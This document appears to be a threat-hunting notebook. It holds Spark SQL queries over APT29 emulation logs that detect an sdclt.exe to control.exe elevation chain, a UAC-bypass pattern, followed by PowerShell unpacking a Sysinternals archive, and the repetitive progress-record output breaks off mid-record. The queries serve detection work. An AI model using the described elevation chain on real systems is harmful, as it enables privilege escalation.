Query ID:09F29912-8E93-461E-9E89-3F06F6763383

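# Sysmon-based telemetry query for this sub-step.
#
# Walks the process chain that the query's filters describe -- control.exe
# spawned by sdclt.exe (b), a High-integrity child of that control.exe (a/c),
# and a powershell.exe child of that (d/e) -- and returns the PowerShell
# script-block text (EventID 4104) logged by that PowerShell process that
# mentions "expand-archive".
#
# Join keys, innermost to outermost:
#   b -> a : a.ParentProcessGuid = b.ProcessGuid   (Sysmon ProcessGuid, stable per process)
#   c -> d : d.ParentProcessGuid = c.ProcessGuid
#   e -> f : f.ExecutionProcessID = e.ProcessId    (plain PID, because 4104 events
#            carry no ProcessGuid; PID reuse can therefore attach script blocks
#            from an unrelated later process to this chain)
# NOTE(review): if the dataset exposes a timestamp column, bounding the
# e -> f join by time would make the PID-based join safer -- TODO confirm.
#
# Fix: every other image comparison lower-cases the column before LIKE, but the
# powershell.exe predicate did not. Spark SQL LIKE is case-sensitive, so a
# differently-cased Image value would silently drop the whole chain; it is now
# normalised like the other predicates.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid = c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND LOWER(d.Image) LIKE "%powershell.exe"
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%expand-archive%"

'''
)
# Full, untruncated rows; vertical layout keeps long script-block text readable.
df.show(100, truncate=False, vertical=True)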
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\"

ScriptBlock ID: 63fc6cf4-cd9f-4134-9231-51ccb5c7d247
Path:  

Query ID:B5F24262-9373-43A4-A83F-0DBB708BD2C0

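# Security-log (EventID 4688) counterpart of the Sysmon query above.
#
# Same process chain, rebuilt from process-creation audit events: control.exe
# created by sdclt.exe (b), a child of it running with a High mandatory label
# and a fully elevated token (a/c), and a powershell.exe child of that (d/e).
# The result is the module-logging payload (EventID 4103) from that PowerShell
# process that mentions "expand-archive".
#
# Join keys: 4688 has no process GUID, so the chain is keyed on the
# NewProcessId / ProcessId hex strings ("0x..."). For the e -> f join the
# "0x" prefix is stripped from NewProcessId and the decimal
# ExecutionProcessID of the 4103 event is converted with hex() and
# lower-cased so the two forms compare equal. As with the Sysmon query,
# a PID-only join is exposed to PID reuse.
#
# Filter constants:
#   MandatoryLabel "S-1-16-12288"  -- High mandatory integrity level SID
#   TokenElevationType "%%1937"    -- full elevated token (TokenElevationTypeFull)
#
# Fix: the powershell.exe predicate was the only image comparison without
# LOWER(); Spark SQL LIKE is case-sensitive, so it is now normalised like
# the others.
df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND LOWER(d.NewProcessName) LIKE "%powershell.exe"
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4103
    AND LOWER(f.Payload) LIKE "%expand-archive%"

'''
)
# Full, untruncated rows; vertical layout keeps multi-line payloads readable.
df.show(100, truncate=False, vertical=True)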
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Expand-Archive): "Expand-Archive"
ParameterBinding(Expand-Archive): name="LiteralPath"; value="C:\Users\pbeesly\Downloads\SysinternalsSuite.zip"
ParameterBinding(Expand-Archive): name="DestinationPath"; value="C:\Users\pbeesly\Downloads\"
ParameterBinding(Expand-Archive): name="Path"; value=""
ParameterBinding(Expand-Archive): name="Force"; value="False"
                                                                                                                                                                                                                                     
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Completed"; value="True"
                                                                                                                                                                                                                                                                                                                                                                                                                               
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="308"
 
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 4-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="307"
 
-RECORD 5-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 6-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="306"
 
-RECORD 7-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 8-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="305"
 
-RECORD 9-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 10----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="304"
 
-RECORD 11----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 12----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="303"
 
-RECORD 13----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 14----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="302"
 
-RECORD 15----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 16----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="301"
 
-RECORD 17----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 18----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="300"
 
-RECORD 19----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 20----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="299"
 
-RECORD 21----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 22----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="298"
 
-RECORD 23----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 24----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="297"
 
-RECORD 25----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 26----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="296"
 
-RECORD 27----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 28----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="295"
 
-RECORD 29----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 30----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="294"
 
-RECORD 31----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 32----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="293"
 
-RECORD 33----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 34----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="292"
 
-RECORD 35----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 36----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
